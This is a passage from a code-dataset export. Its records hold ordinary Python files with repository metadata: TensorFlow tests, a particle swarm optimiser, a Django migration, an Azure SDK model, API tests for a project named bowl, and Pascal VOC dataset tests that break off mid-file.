def testOptimizerNonSlotVarsInDefunNoError(self):
def loss(v):
return v**2
optimizer = adam.AdamOptimizer(learning_rate=1.0)
@function.defun
def train():
self.v = resource_variable_ops.ResourceVariable(1.0)
grad = backprop.implicit_grad(loss)(self.v)
optimizer.apply_gradients(grad)
return self.v.read_value()
train()
def testOptimizerInDefunWithCapturedVariable(self):
v = resource_variable_ops.ResourceVariable(1.0)
def loss():
return v**2
optimizer = momentum.MomentumOptimizer(learning_rate=1.0, momentum=1.0)
@function.defun
def train():
grad = backprop.implicit_grad(loss)()
optimizer.apply_gradients(grad)
train()
self.assertEqual(v.numpy(), -1.0)
def testRepeatedResourceInput(self):
var = resource_variable_ops.ResourceVariable(1.0)
@def_function.function
def inner(var1, var2):
return (resource_variable_ops.read_variable_op(var1, dtypes.float32) +
resource_variable_ops.read_variable_op(var2, dtypes.float32))
@def_function.function
def outer():
return inner(var.handle, var.handle)
self.assertEqual(self.evaluate(outer()), 2.0)
if __name__ == "__main__":
ops.enable_eager_execution()
test.main()
| [
"[email protected]"
] | |
32aa5d9cac9deb1adfdf09a485151fce534ecd73 | a3f3c625af98882a7f1775de1e6187f1ead4e32b | /playground/swarm/pso.py | 0fa9e4d29e75bad2e8c5e50770db40f8b8c213ee | [
"MIT"
] | permissive | StanJBrown/playground | e0846986af5939be77ee561794b5bd0c94a37c28 | f372c3c547d0ad34f9bdffaa2b2e93d089a3f5a4 | refs/heads/master | 2020-07-01T11:45:45.410104 | 2014-12-12T19:19:39 | 2014-12-12T19:19:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,542 | py | #!/usr/bin/env python2
import os
import sys
import time
from random import random
from random import uniform
sys.path.append(os.path.join(os.path.dirname(__file__), "../../"))
import matplotlib.pylab as plt
from playground.population import Population
class PSOParticle(object):
def __init__(self, **kwargs):
self.score = kwargs.get("score", None)
self.best_score = self.score
self.position = kwargs.get("position", None)
self.best_position = self.position
self.velocity = kwargs.get("velocity", None)
self.bounds = kwargs.get("bounds", None)
self.max_velocity = kwargs.get("max_velocity", None)
def update_velocity(self, best, c_1, c_2):
if self.max_velocity is None:
raise RuntimeError("max_velocity is None!")
# loop through each dimension
for i in range(len(self.position)):
# calcuate cognitive and social components
cog = c_1 * random() * (self.best_position[i] - self.position[i])
soc = c_2 * random() * (best.best_position[i] - self.position[i])
# update velocity
self.velocity[i] = self.velocity[i] + cog + soc
# if velocity reaches max, cap the velocity
if self.velocity[i] > self.max_velocity[i]:
self.velocity[i] = self.max_velocity[i]
elif self.velocity[i] < -self.max_velocity[i]:
self.velocity[i] = -self.max_velocity[i]
def check_over_bounds(self):
if self.bounds is None:
raise RuntimeError("bounds is None!")
# loop through each dimension
for i in range(len(self.bounds)):
# get min and max boundary for i-th dimension
min_bound = self.bounds[i][0]
max_bound = self.bounds[i][1]
# check for over the boundary
if self.position[i] > max_bound:
diff = abs(self.position[i] - max_bound)
self.position[i] = max_bound - diff
self.velocity[i] *= -1.0 # reverse direction
# check for under the boundary
elif self.position[i] < min_bound:
diff = abs(self.position[i] - min_bound)
self.position[i] = min_bound + diff
self.velocity[i] *= -1.0 # reverse direction
def update_position(self):
# loop through each dimension
for i in range(len(self.position)):
# update position
self.position[i] = self.position[i] + self.velocity[i]
# check if over bounds
self.check_over_bounds()
def update_best_position(self):
if self.score < self.best_score:
self.best_score = self.score
self.best_position = self.position
class PSOParticleGenerator(object):
def __init__(self, config):
self.config = config
self.bounds = config.get("bounds", None)
self.max_velocity = config.get("max_velocity", None)
self.obj_func = config.get("objective_function", None)
def random_velocity_vector(self):
if self.max_velocity is None:
raise RuntimeError("max velocity is None!")
random_vector = []
for i in range(len(self.max_velocity)):
min_bound = self.max_velocity[i]
max_bound = -self.max_velocity[i]
random_num = uniform(min_bound, max_bound)
random_vector.append(random_num)
return random_vector
def random_position_vector(self):
if self.bounds is None:
raise RuntimeError("bounds is None!")
random_vector = []
for i in range(len(self.bounds)):
min_bound = self.bounds[i][0]
max_bound = self.bounds[i][1]
random_num = uniform(min_bound, max_bound)
random_vector.append(random_num)
return random_vector
def create_particle(self):
if self.obj_func is None:
raise RuntimeError("obj_func is None!")
particle = PSOParticle()
# position
particle.position = self.random_position_vector()
particle.best_position = particle.position
# velocity
particle.velocity = self.random_velocity_vector()
# score
particle.score = self.obj_func(particle.position)
particle.best_score = particle.score
# boundaries for position and velocity
particle.bounds = self.bounds
particle.max_velocity = self.max_velocity
return particle
def init(self):
population = Population(self.config)
for i in range(self.config["max_population"]):
particle = self.create_particle()
population.individuals.append(particle)
return population
def pso_search(population, config):
obj_func = config["objective_function"]
gbest = population.find_best_individuals()[0]
max_generations = config["max_generations"]
c_1 = config["c_1"]
c_2 = config["c_2"]
# search loop
for gen in range(max_generations):
# update particles
for particle in population.individuals:
particle.update_velocity(gbest, c_1, c_2)
particle.update_position()
particle.score = obj_func(particle.position)
particle.update_best_position()
# update global best
population.sort_individuals()
gen_best = population.find_best_individuals()[0]
if gen_best.score < gbest.score:
gbest = PSOParticle(
score=gen_best.score,
position=list(gen_best.position),
velocity=list(gen_best.velocity),
bounds=gen_best.bounds,
max_velocity=gen_best.max_velocity
)
# print
print " > gen {0}, fitness={1}".format(gen, gbest.score)
# display animation
if config.get("animate", False):
# pre-check
if len(config["bounds"]) > 2:
raise RuntimeError("Animate does not support > 2 dimensions!")
# animate swarm
x = [p.position[0] for p in population.individuals]
y = [p.position[1] for p in population.individuals]
plt.clf() # clear figure
plt.scatter(x, y)
plt.xlim(config["bounds"][0])
plt.ylim(config["bounds"][1])
plt.draw()
plt.show(block=False)
time.sleep(config.get("animation_frame_delay", 0.1))
return (gbest.position, gbest.score)
| [
"[email protected]"
] | |
45a709071d8ec420e128a6a4db0795c863d79579 | 2cfcc435d82455e5273c2643092cda8f641e1f50 | /portfolio/migrations/0023_auto_20190712_1402.py | 675aaabf9c944f9b8d63bcd81494b2c0faf5c96a | [] | no_license | iAnafem/My_website | bdc8804bfe099e095faa96233d138278d9a8f11b | 6cb1498809ef2027b419960544c8101649cb5c89 | refs/heads/master | 2022-12-09T15:23:32.717676 | 2019-08-22T20:03:45 | 2019-08-22T20:03:45 | 187,834,896 | 0 | 0 | null | 2022-12-08T05:51:02 | 2019-05-21T12:41:47 | Python | UTF-8 | Python | false | false | 408 | py | # Generated by Django 2.2.3 on 2019-07-12 11:02
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('portfolio', '0022_auto_20190712_1357'),
]
operations = [
migrations.AlterField(
model_name='projectimages',
name='description',
field=models.TextField(blank=True, null=True),
),
]
| [
"[email protected]"
] | |
1e7986478e8ef71cc2aa8e795af6d16af4a20b41 | 287a10a6f28517003728aebbd7ed097af13a8d18 | /exp_170508_after_bug_fix_in_mc/create_border_contact_figure.py | 8987102c8da185cc105167ad1679624f50405007 | [] | no_license | jhennies/nmmp_experiments | 05c78c6068fa0f6df0002e57529cd7b8d1daa456 | 7c06a5818a5176fa0dc17a42ba22b2262239d91d | refs/heads/master | 2021-04-06T12:01:25.537695 | 2017-09-22T13:42:51 | 2017-09-22T13:42:51 | 83,289,168 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,000 | py |
from multicut_src.false_merges.compute_border_contacts import compute_border_contacts_old
from multicut_src import load_dataset
import os
import vigra
from multicut_src import ExperimentSettings
from pipeline import find_false_merges
# TODO Change here
from init_exp_splB_z0 import meta_folder, project_folder, source_folder, experiment_folder
from run_mc_splB_z0 import result_key
# Path folders
test_paths_cache_folder = os.path.join(meta_folder, 'path_data')
train_paths_cache_folder = os.path.join(project_folder, 'train_paths_cache')
if __name__ == '__main__':
# TODO Change here
from init_exp_splB_z0 import test_name
from run_mc_splB_z0 import rf_cache_folder
test_seg_filepath = experiment_folder + 'result.h5'
seg = vigra.readHDF5(test_seg_filepath, 'z/0/data')[0: 300, 0:300, :]
ds_test = load_dataset(meta_folder, test_name)
from matplotlib import pyplot as plt
dt = ds_test.inp(2)[0: 300, 0:300, :]
compute_border_contacts_old(seg, dt)
| [
"[email protected]"
] | |
1507896221705c44fb7ce9ab7818ac2b66f65fd7 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02682/s859546484.py | cba7ac8502d2fc8816e0d58c1f99f1e9a8ff57f7 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 184 | py | A, B, C, K = map(int, input().split())
if((K-A)>0):
Y = K-A
else:
print(K)
exit()
if((Y-B)>0):
Z = Y-B
else:
Z = 0
X = A + 0 * Y + (-1) * Z
print(X)
| [
"[email protected]"
] | |
d664c90d8aebc67f3b56264fc249bd376fb266fe | efb1eb654d3477b411f82f83762796372b5c803b | /src/config/django/__init__.py | e2581d7f443403883d115c08422b6f43ce23640a | [
"MIT"
] | permissive | Rydra/mastermind-api | d9bcc6857fe4e3ad2a77560babd64a5d8ded59b7 | 850963b472644dd66b042223ffd86726af60bcda | refs/heads/master | 2023-02-22T03:10:49.589415 | 2022-12-29T14:37:08 | 2022-12-29T14:37:08 | 192,472,100 | 0 | 0 | MIT | 2023-02-15T20:28:40 | 2019-06-18T05:33:59 | Python | UTF-8 | Python | false | false | 161 | py | from split_settings.tools import include
from config.settings import Settings
settings = Settings()
ENVIRONMENT = settings.env
include("base.py", "local.py")
| [
"[email protected]"
] | |
d553a694c1bc0ece302e0020fb2752ee528044af | c1bd12405d244c5924a4b069286cd9baf2c63895 | /azure-mgmt-monitor/azure/mgmt/monitor/models/diagnostic_settings_resource_collection.py | 396b3e7b7afb2b9f28ec3a523a1fe743d47e6fbd | [
"MIT"
] | permissive | lmazuel/azure-sdk-for-python | 972708ad5902778004680b142874582a284a8a7c | b40e0e36cc00a82b7f8ca2fa599b1928240c98b5 | refs/heads/master | 2022-08-16T02:32:14.070707 | 2018-03-29T17:16:15 | 2018-03-29T17:16:15 | 21,287,134 | 1 | 3 | MIT | 2019-10-25T15:56:00 | 2014-06-27T19:40:56 | Python | UTF-8 | Python | false | false | 1,040 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class DiagnosticSettingsResourceCollection(Model):
"""Represents a collection of alert rule resources.
:param value: The collection of diagnostic settings resources;.
:type value: list[~azure.mgmt.monitor.models.DiagnosticSettingsResource]
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[DiagnosticSettingsResource]'},
}
def __init__(self, **kwargs):
super(DiagnosticSettingsResourceCollection, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
| [
"[email protected]"
] | |
d0f861cc95b97c0247df14a8af581cee071c46e6 | 3dfb2fcf1236eebc1e306ec6c071a8b02441c597 | /tests/test_api.py | 6c9544f2816beb6bddcc947a280d3b981569de14 | [
"Apache-2.0"
] | permissive | pombredanne/bowl | fdb10e2b824246adcdced718d5eded10ba840c33 | 3f7765a85c9b2954f7d40f919f18573f24a46580 | refs/heads/master | 2021-01-16T17:58:23.241810 | 2014-12-24T06:46:18 | 2014-12-24T06:46:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,719 | py | """
This module is the test suite of the API for bowl.
Created on 27 July 2014
@author: Charlie Lewis
"""
import os
import pkg_resources
import requests
import sys
from bowl import api
class Object(object):
pass
class TestClass:
"""
This class is responsible for all tests in the API.
"""
def start_server(self):
path = os.path.dirname(api.__file__)
child_pid = os.fork()
pid = -1
if child_pid == 0:
# child process
os.chdir(path)
api.main()
else:
pid = child_pid
return pid
def stop_server(self, child_pid):
if child_pid:
os.kill(int(child_pid), 9)
def test_setup(self):
a = api.main().__new__(api.main)
a.setup()
assert 1
def test_root(self):
a = api.root()
a.GET()
assert 1
def test_add(self):
a = api.api_add()
a.POST()
assert 1
def test_connect(self):
a = api.api_connect()
a.GET("host")
assert 1
def test_delete(self):
a = api.api_delete()
a.GET("test")
assert 1
def test_disconnect(self):
a = api.api_disconnect()
a.GET("host")
assert 1
def test_hosts(self):
a = api.api_hosts()
a.GET()
assert 1
def test_image_import(self):
a = api.api_image_import()
a.POST()
assert 1
def test_images(self):
a = api.api_images()
a.GET()
assert 1
def test_info(self):
a = api.api_info()
a.GET()
assert 1
def test_kill(self):
a = api.api_kill()
a.GET("container")
assert 1
def test_link(self):
a = api.api_link()
a.GET("repository")
assert 1
def test_list(self):
a = api.api_list()
a.GET()
assert 1
def test_login(self):
a = api.api_login()
a.POST()
assert 1
def test_logout(self):
a = api.api_logout()
a.POST()
assert 1
def test_logs(self):
a = api.api_logs()
a.GET("container")
assert 1
def test_new(self):
a = api.api_new()
a.POST()
assert 1
def test_remove(self):
a = api.api_remove()
a.POST()
assert 1
def test_repositories(self):
a = api.api_repositories()
a.GET()
assert 1
def test_repo_services(self):
a = api.api_repo_services()
a.GET()
assert 1
def test_services(self):
a = api.api_services()
a.GET()
assert 1
def test_snapshot(self):
a = api.api_snapshot()
a.GET("container")
assert 1
def test_snapshots(self):
a = api.api_snapshots()
a.GET()
assert 1
def test_subtract(self):
a = api.api_subtract()
a.GET("os", "version", "type", "name")
assert 1
def test_test(self):
# !! TODO make sure this isn't recursive
a = api.api_test()
a.GET()
assert 1
def test_unlink(self):
a = api.api_unlink()
a.GET("repository")
assert 1
def test_uptime(self):
a = api.api_uptime()
a.GET()
assert 1
def test_version(self):
a = api.api_version()
# !! TODO not working with travis for some reason
#a.GET()
#child_pid = self.start_server()
#response = requests.get('http://localhost:8080/version')
#version = pkg_resources.get_distribution("bowl").version
#self.stop_server(child_pid)
#assert response.text == version
assert 1
| [
"[email protected]"
] | |
85f3359e9fb29b9c128520c9c5bbd5763fe522d9 | 04b245c8fb6bb09eeb6d8ee962f924d656b4292e | /datumaro/tests/test_voc_format.py | de58ce40ce4f90028f8cc4dba27f13778a0ca0e0 | [
"MIT"
] | permissive | researchapps/cvat | 11b57a59bd6fdca1f899c744526035b43f9f3891 | eb896a1bdd69e5b624b1178c3dc203d95e787dfe | refs/heads/develop | 2020-12-22T15:43:51.072769 | 2020-03-01T19:27:53 | 2020-03-01T19:27:53 | 236,845,460 | 1 | 1 | NOASSERTION | 2020-03-01T18:46:22 | 2020-01-28T21:26:33 | null | UTF-8 | Python | false | false | 23,978 | py | import cv2
import numpy as np
import os
import os.path as osp
from xml.etree import ElementTree as ET
import shutil
from unittest import TestCase
from datumaro.components.extractor import (Extractor, DatasetItem,
AnnotationType, BboxObject, LabelCategories,
)
import datumaro.components.formats.voc as VOC
from datumaro.components.extractors.voc import (
VocClassificationExtractor,
VocDetectionExtractor,
VocSegmentationExtractor,
VocLayoutExtractor,
VocActionExtractor,
)
from datumaro.components.converters.voc import (
VocConverter,
VocClassificationConverter,
VocDetectionConverter,
VocLayoutConverter,
VocActionConverter,
VocSegmentationConverter,
)
from datumaro.components.importers.voc import VocImporter
from datumaro.components.project import Project
from datumaro.util import find
from datumaro.util.test_utils import TestDir
class VocTest(TestCase):
def test_colormap_generator(self):
reference = np.array([
[ 0, 0, 0],
[128, 0, 0],
[ 0, 128, 0],
[128, 128, 0],
[ 0, 0, 128],
[128, 0, 128],
[ 0, 128, 128],
[128, 128, 128],
[ 64, 0, 0],
[192, 0, 0],
[ 64, 128, 0],
[192, 128, 0],
[ 64, 0, 128],
[192, 0, 128],
[ 64, 128, 128],
[192, 128, 128],
[ 0, 64, 0],
[128, 64, 0],
[ 0, 192, 0],
[128, 192, 0],
[ 0, 64, 128],
[224, 224, 192], # ignored
])
self.assertTrue(np.array_equal(reference, list(VOC.VocColormap.values())))
def get_label(extractor, label_id):
return extractor.categories()[AnnotationType.label].items[label_id].name
def generate_dummy_voc(path):
cls_subsets_dir = osp.join(path, 'ImageSets', 'Main')
action_subsets_dir = osp.join(path, 'ImageSets', 'Action')
layout_subsets_dir = osp.join(path, 'ImageSets', 'Layout')
segm_subsets_dir = osp.join(path, 'ImageSets', 'Segmentation')
ann_dir = osp.join(path, 'Annotations')
img_dir = osp.join(path, 'JPEGImages')
segm_dir = osp.join(path, 'SegmentationClass')
inst_dir = osp.join(path, 'SegmentationObject')
os.makedirs(cls_subsets_dir)
os.makedirs(ann_dir)
os.makedirs(img_dir)
os.makedirs(segm_dir)
os.makedirs(inst_dir)
subsets = {
'train': ['2007_000001'],
'test': ['2007_000002'],
}
# Subsets
for subset_name, subset in subsets.items():
for item in subset:
with open(osp.join(cls_subsets_dir, subset_name + '.txt'), 'w') as f:
for item in subset:
f.write('%s\n' % item)
shutil.copytree(cls_subsets_dir, action_subsets_dir)
shutil.copytree(cls_subsets_dir, layout_subsets_dir)
shutil.copytree(cls_subsets_dir, segm_subsets_dir)
# Classification
subset_name = 'train'
subset = subsets[subset_name]
for label in VOC.VocLabel:
with open(osp.join(cls_subsets_dir, '%s_%s.txt' % \
(label.name, subset_name)), 'w') as f:
for item in subset:
presence = label.value % 2
f.write('%s %2d\n' % (item, 1 if presence else -1))
# Detection + Action + Layout
subset_name = 'train'
subset = subsets[subset_name]
for item in subset:
root_elem = ET.Element('annotation')
ET.SubElement(root_elem, 'folder').text = 'VOC' + item.split('_')[0]
ET.SubElement(root_elem, 'filename').text = item + '.jpg'
size_elem = ET.SubElement(root_elem, 'size')
ET.SubElement(size_elem, 'width').text = '10'
ET.SubElement(size_elem, 'height').text = '20'
ET.SubElement(size_elem, 'depth').text = '3'
ET.SubElement(root_elem, 'segmented').text = '1'
obj1_elem = ET.SubElement(root_elem, 'object')
ET.SubElement(obj1_elem, 'name').text = VOC.VocLabel(1).name
ET.SubElement(obj1_elem, 'pose').text = VOC.VocPose(1).name
ET.SubElement(obj1_elem, 'truncated').text = '1'
ET.SubElement(obj1_elem, 'difficult').text = '0'
obj1bb_elem = ET.SubElement(obj1_elem, 'bndbox')
ET.SubElement(obj1bb_elem, 'xmin').text = '1'
ET.SubElement(obj1bb_elem, 'ymin').text = '2'
ET.SubElement(obj1bb_elem, 'xmax').text = '3'
ET.SubElement(obj1bb_elem, 'ymax').text = '4'
obj2_elem = ET.SubElement(root_elem, 'object')
ET.SubElement(obj2_elem, 'name').text = VOC.VocLabel.person.name
obj2bb_elem = ET.SubElement(obj2_elem, 'bndbox')
ET.SubElement(obj2bb_elem, 'xmin').text = '4'
ET.SubElement(obj2bb_elem, 'ymin').text = '5'
ET.SubElement(obj2bb_elem, 'xmax').text = '6'
ET.SubElement(obj2bb_elem, 'ymax').text = '7'
obj2head_elem = ET.SubElement(obj2_elem, 'part')
ET.SubElement(obj2head_elem, 'name').text = VOC.VocBodyPart(1).name
obj2headbb_elem = ET.SubElement(obj2head_elem, 'bndbox')
ET.SubElement(obj2headbb_elem, 'xmin').text = '5.5'
ET.SubElement(obj2headbb_elem, 'ymin').text = '6'
ET.SubElement(obj2headbb_elem, 'xmax').text = '7.5'
ET.SubElement(obj2headbb_elem, 'ymax').text = '8'
obj2act_elem = ET.SubElement(obj2_elem, 'actions')
for act in VOC.VocAction:
ET.SubElement(obj2act_elem, act.name).text = '%s' % (act.value % 2)
with open(osp.join(ann_dir, item + '.xml'), 'w') as f:
f.write(ET.tostring(root_elem, encoding='unicode'))
# Segmentation + Instances
subset_name = 'train'
subset = subsets[subset_name]
for item in subset:
cv2.imwrite(osp.join(segm_dir, item + '.png'),
np.ones([10, 20, 3]) * VOC.VocColormap[2])
cv2.imwrite(osp.join(inst_dir, item + '.png'),
np.ones([10, 20, 3]) * VOC.VocColormap[2])
# Test images
subset_name = 'test'
subset = subsets[subset_name]
for item in subset:
cv2.imwrite(osp.join(img_dir, item + '.jpg'),
np.ones([10, 20, 3]))
return subsets
class VocExtractorTest(TestCase):
def test_can_load_voc_cls(self):
with TestDir() as test_dir:
generated_subsets = generate_dummy_voc(test_dir.path)
extractor = VocClassificationExtractor(test_dir.path)
self.assertEqual(len(generated_subsets), len(extractor.subsets()))
subset_name = 'train'
generated_subset = generated_subsets[subset_name]
for id_ in generated_subset:
parsed_subset = extractor.get_subset(subset_name)
self.assertEqual(len(generated_subset), len(parsed_subset))
item = find(parsed_subset, lambda x: x.id == id_)
self.assertFalse(item is None)
count = 0
for label in VOC.VocLabel:
if label.value % 2 == 1:
count += 1
ann = find(item.annotations,
lambda x: x.type == AnnotationType.label and \
get_label(extractor, x.label) == label.name)
self.assertFalse(ann is None)
self.assertEqual(count, len(item.annotations))
subset_name = 'test'
generated_subset = generated_subsets[subset_name]
for id_ in generated_subset:
parsed_subset = extractor.get_subset(subset_name)
self.assertEqual(len(generated_subset), len(parsed_subset))
item = find(parsed_subset, lambda x: x.id == id_)
self.assertFalse(item is None)
self.assertEqual(0, len(item.annotations))
def test_can_load_voc_det(self):
with TestDir() as test_dir:
generated_subsets = generate_dummy_voc(test_dir.path)
extractor = VocDetectionExtractor(test_dir.path)
self.assertEqual(len(generated_subsets), len(extractor.subsets()))
subset_name = 'train'
generated_subset = generated_subsets[subset_name]
for id_ in generated_subset:
parsed_subset = extractor.get_subset(subset_name)
self.assertEqual(len(generated_subset), len(parsed_subset))
item = find(parsed_subset, lambda x: x.id == id_)
self.assertFalse(item is None)
obj1 = find(item.annotations,
lambda x: x.type == AnnotationType.bbox and \
get_label(extractor, x.label) == VOC.VocLabel(1).name)
self.assertFalse(obj1 is None)
self.assertListEqual([1, 2, 2, 2], obj1.get_bbox())
self.assertDictEqual(
{
'pose': VOC.VocPose(1).name,
'truncated': True,
'occluded': False,
'difficult': False,
},
obj1.attributes)
obj2 = find(item.annotations,
lambda x: x.type == AnnotationType.bbox and \
get_label(extractor, x.label) == VOC.VocLabel.person.name)
self.assertFalse(obj2 is None)
self.assertListEqual([4, 5, 2, 2], obj2.get_bbox())
self.assertEqual(2, len(item.annotations))
subset_name = 'test'
generated_subset = generated_subsets[subset_name]
for id_ in generated_subset:
parsed_subset = extractor.get_subset(subset_name)
self.assertEqual(len(generated_subset), len(parsed_subset))
item = find(parsed_subset, lambda x: x.id == id_)
self.assertFalse(item is None)
self.assertEqual(0, len(item.annotations))
def test_can_load_voc_segm(self):
with TestDir() as test_dir:
generated_subsets = generate_dummy_voc(test_dir.path)
extractor = VocSegmentationExtractor(test_dir.path)
self.assertEqual(len(generated_subsets), len(extractor.subsets()))
subset_name = 'train'
generated_subset = generated_subsets[subset_name]
for id_ in generated_subset:
parsed_subset = extractor.get_subset(subset_name)
self.assertEqual(len(generated_subset), len(parsed_subset))
item = find(parsed_subset, lambda x: x.id == id_)
self.assertFalse(item is None)
cls_mask = find(item.annotations,
lambda x: x.type == AnnotationType.mask and \
x.attributes.get('class') == True)
self.assertFalse(cls_mask is None)
self.assertFalse(cls_mask.image is None)
inst_mask = find(item.annotations,
lambda x: x.type == AnnotationType.mask and \
x.attributes.get('instances') == True)
self.assertFalse(inst_mask is None)
self.assertFalse(inst_mask.image is None)
self.assertEqual(2, len(item.annotations))
subset_name = 'test'
generated_subset = generated_subsets[subset_name]
for id_ in generated_subset:
parsed_subset = extractor.get_subset(subset_name)
self.assertEqual(len(generated_subset), len(parsed_subset))
item = find(parsed_subset, lambda x: x.id == id_)
self.assertFalse(item is None)
self.assertEqual(0, len(item.annotations))
def test_can_load_voc_layout(self):
with TestDir() as test_dir:
generated_subsets = generate_dummy_voc(test_dir.path)
extractor = VocLayoutExtractor(test_dir.path)
self.assertEqual(len(generated_subsets), len(extractor.subsets()))
subset_name = 'train'
generated_subset = generated_subsets[subset_name]
for id_ in generated_subset:
parsed_subset = extractor.get_subset(subset_name)
self.assertEqual(len(generated_subset), len(parsed_subset))
item = find(parsed_subset, lambda x: x.id == id_)
self.assertFalse(item is None)
obj2 = find(item.annotations,
lambda x: x.type == AnnotationType.bbox and \
get_label(extractor, x.label) == VOC.VocLabel.person.name)
self.assertFalse(obj2 is None)
self.assertListEqual([4, 5, 2, 2], obj2.get_bbox())
obj2head = find(item.annotations,
lambda x: x.type == AnnotationType.bbox and \
get_label(extractor, x.label) == VOC.VocBodyPart(1).name)
self.assertTrue(obj2.id == obj2head.group)
self.assertListEqual([5.5, 6, 2, 2], obj2head.get_bbox())
self.assertEqual(2, len(item.annotations))
subset_name = 'test'
generated_subset = generated_subsets[subset_name]
for id_ in generated_subset:
parsed_subset = extractor.get_subset(subset_name)
self.assertEqual(len(generated_subset), len(parsed_subset))
item = find(parsed_subset, lambda x: x.id == id_)
self.assertFalse(item is None)
self.assertEqual(0, len(item.annotations))
def test_can_load_voc_action(self):
with TestDir() as test_dir:
generated_subsets = generate_dummy_voc(test_dir.path)
extractor = VocActionExtractor(test_dir.path)
self.assertEqual(len(generated_subsets), len(extractor.subsets()))
subset_name = 'train'
generated_subset = generated_subsets[subset_name]
for id_ in generated_subset:
parsed_subset = extractor.get_subset(subset_name)
self.assertEqual(len(generated_subset), len(parsed_subset))
item = find(parsed_subset, lambda x: x.id == id_)
self.assertFalse(item is None)
obj2 = find(item.annotations,
lambda x: x.type == AnnotationType.bbox and \
get_label(extractor, x.label) == VOC.VocLabel.person.name)
self.assertFalse(obj2 is None)
self.assertListEqual([4, 5, 2, 2], obj2.get_bbox())
for action in VOC.VocAction:
attr = obj2.attributes[action.name]
self.assertEqual(attr, action.value % 2)
subset_name = 'test'
generated_subset = generated_subsets[subset_name]
for id_ in generated_subset:
parsed_subset = extractor.get_subset(subset_name)
self.assertEqual(len(generated_subset), len(parsed_subset))
item = find(parsed_subset, lambda x: x.id == id_)
self.assertFalse(item is None)
self.assertEqual(0, len(item.annotations))
class VocConverterTest(TestCase):
def _test_can_save_voc(self, src_extractor, converter, test_dir,
target_extractor=None):
converter(src_extractor, test_dir)
result_extractor = VocImporter()(test_dir).make_dataset()
if target_extractor is None:
target_extractor = src_extractor
if AnnotationType.label in target_extractor.categories():
self.assertEqual(
target_extractor.categories()[AnnotationType.label].items,
result_extractor.categories()[AnnotationType.label].items)
if AnnotationType.mask in target_extractor.categories():
self.assertEqual(
target_extractor.categories()[AnnotationType.mask].colormap,
result_extractor.categories()[AnnotationType.mask].colormap)
self.assertEqual(len(target_extractor), len(result_extractor))
for item_a, item_b in zip(target_extractor, result_extractor):
self.assertEqual(item_a.id, item_b.id)
self.assertEqual(len(item_a.annotations), len(item_b.annotations))
for ann_a, ann_b in zip(item_a.annotations, item_b.annotations):
self.assertEqual(ann_a.type, ann_b.type)
def _test_can_save_voc_dummy(self, extractor_type, converter, test_dir):
dummy_dir = osp.join(test_dir, 'dummy')
generate_dummy_voc(dummy_dir)
gen_extractor = extractor_type(dummy_dir)
self._test_can_save_voc(gen_extractor, converter,
osp.join(test_dir, 'converted'))
def test_can_save_voc_cls(self):
with TestDir() as test_dir:
self._test_can_save_voc_dummy(
VocClassificationExtractor, VocClassificationConverter(label_map='voc'),
test_dir.path)
def test_can_save_voc_det(self):
with TestDir() as test_dir:
self._test_can_save_voc_dummy(
VocDetectionExtractor, VocDetectionConverter(label_map='voc'),
test_dir.path)
def test_can_save_voc_segm(self):
with TestDir() as test_dir:
self._test_can_save_voc_dummy(
VocSegmentationExtractor, VocSegmentationConverter(label_map='voc'),
test_dir.path)
def test_can_save_voc_layout(self):
with TestDir() as test_dir:
self._test_can_save_voc_dummy(
VocLayoutExtractor, VocLayoutConverter(label_map='voc'),
test_dir.path)
def test_can_save_voc_action(self):
with TestDir() as test_dir:
self._test_can_save_voc_dummy(
VocActionExtractor, VocActionConverter(label_map='voc'),
test_dir.path)
def test_can_save_dataset_with_no_subsets(self):
class TestExtractor(Extractor):
def __iter__(self):
return iter([
DatasetItem(id=1, annotations=[
BboxObject(2, 3, 4, 5, label=2, id=1),
BboxObject(2, 3, 4, 5, label=3, id=2),
]),
DatasetItem(id=2, annotations=[
BboxObject(5, 4, 6, 5, label=3, id=1),
]),
])
def categories(self):
return VOC.make_voc_categories()
with TestDir() as test_dir:
self._test_can_save_voc(TestExtractor(), VocConverter(label_map='voc'),
test_dir.path)
def test_dataset_with_voc_labelmap(self):
class SrcExtractor(Extractor):
def __iter__(self):
yield DatasetItem(id=1, annotations=[
BboxObject(2, 3, 4, 5, label=0, id=1),
BboxObject(1, 2, 3, 4, label=1, id=2),
])
def categories(self):
label_cat = LabelCategories()
label_cat.add(VOC.VocLabel(1).name)
label_cat.add('non_voc_label')
return {
AnnotationType.label: label_cat,
}
class DstExtractor(Extractor):
def __iter__(self):
yield DatasetItem(id=1, annotations=[
BboxObject(2, 3, 4, 5, label=0, id=1),
])
def categories(self):
return VOC.make_voc_categories()
with TestDir() as test_dir:
self._test_can_save_voc(
SrcExtractor(), VocConverter(label_map='voc'),
test_dir.path, target_extractor=DstExtractor())
def test_dataset_with_guessed_labelmap(self):
class SrcExtractor(Extractor):
def __iter__(self):
yield DatasetItem(id=1, annotations=[
BboxObject(2, 3, 4, 5, label=0, id=1),
BboxObject(1, 2, 3, 4, label=1, id=2),
])
def categories(self):
label_cat = LabelCategories()
label_cat.add(VOC.VocLabel(1).name)
label_cat.add('non_voc_label')
return {
AnnotationType.label: label_cat,
}
class DstExtractor(Extractor):
def __iter__(self):
yield DatasetItem(id=1, annotations=[
BboxObject(2, 3, 4, 5, label=0, id=1),
BboxObject(1, 2, 3, 4,
label=self.categories()[AnnotationType.label] \
.find('non_voc_label')[0], id=2),
])
def categories(self):
label_map = VOC.make_voc_label_map()
label_map['non_voc_label'] = [None, [], []]
for label_desc in label_map.values():
label_desc[0] = None # rebuild colormap
return VOC.make_voc_categories(label_map)
